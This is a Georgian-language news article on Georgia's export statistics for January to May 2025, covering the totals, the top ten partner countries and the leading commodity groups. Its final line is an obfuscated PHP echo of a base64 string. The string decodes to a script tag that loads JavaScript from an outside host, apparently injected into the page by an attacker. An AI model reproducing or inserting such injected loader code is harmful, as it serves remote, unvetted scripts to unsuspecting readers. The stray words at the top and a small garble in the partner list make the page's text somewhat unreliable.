gorgia
jaluzi

2025 წლის იანვარ-მაისში საქართველოდან განხორციელებული საქონლის ექსპორტის მოცულობამ 2.594 მლრდ დოლარი შეადგინა, რაც წინა წლის ანალოგიურ პერიოდთან შედარებით 14.6%-ით ზრდაზე მიუთითებს. (2024 წლის 5 თვე 2.264 მლრდ დოლარი).

სტატისტიკის ეროვნული სამსახურის ინფორმაციით, ქართული წარმოების პროდუქციის ექსპორტი მთლიანი ექსპორტის 45.1 პროცენტს შეადგენს. მათივე ცნობით, აღნიშნული მაჩვენებელი წინა წლის შესაბამის პერიოდთან შედარებით 6.1%-ით გაიზარდა და 1.169 მლრდ დოლარს გაუტოლდა. აღსანიშნავია, რომ გასული წლის ანალოგიურ პერიოდში ქვეყნიდან 1.102 მლრდ დოლარის ღირებულების ქართული პროდუქციის ექსპორტი განხორციელდა.

ამასთან, საქსტატის ცნობით, წელს ხუთ თვეში 10 უმსხვილესი ქვეყნის წილმა საქართველოს მთლიან ადგილობრივ ექსპორტში 70 პროცენტი შეადგინა. საანგარიშო პერიოდში 1- უმსხვილესი საექსპორტო პარტნიორი ქვეყანა ასე გამოყურება:

რუსეთი - 229.035 მილიონი დოლარი (წილი 19.6%);
ჩინეთი - 121.083 მილიონი დოლარი (წილი 10.4%);
თურქეთი - 119.981 მილიონი დოლარი (წილი 10.3%);
ბულგარეთი - 80.303 მილიონი დოლარი (წილი 6.9%);
სომხეთი - 64.771 მილიონი დოლარი (წილი 5.5%);
აზერბაიჯანი - 55.274 მილიონი დოლარი (წილი 4.7%);
შვეიცარია - 44.364 მილიონი დოლარი (წილი 3.8%);
ყაზახეთი - 35.108 მილიონი დოლარი (წილი 3%);
აშშ - 35.093 მილიონი დოლარი (წილი 3%);
უკრაინა - 34.268 მილიონი დოლარი (წილი 2.9%).
საქსტატის ცნობით, 2025 წლის იანვარ-მაისში ადგილობრივი ექსპორტის ათეულში პირველ ადგილზე ძვირფასი ლითონების მადნები და კონცენტრატები არის წარმოდგენილი 136.5 მლნ. აშშ დოლარით, აღნიშნული სასაქონლო ჯგუფის წილი მთლიანი ადგილობრივი ექსპორტის 11.7 პროცენტს შეადგენს.

ამასთანავე, მეორე ადგილზეა ყურძნის ნატურალური ღვინოები, 97.2 მლნ. აშშ დოლარით (მთლიანი ადგილობრივი ექსპორტის 8.3 პროცენტი), ხოლო მესამე ადგილს იკავებს სპირტიანი სასმელები 82.2 მლნ. აშშ დოლარით (მთლიანი ადგილობრივი ექსპორტის 7.0 პროცენტი).

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");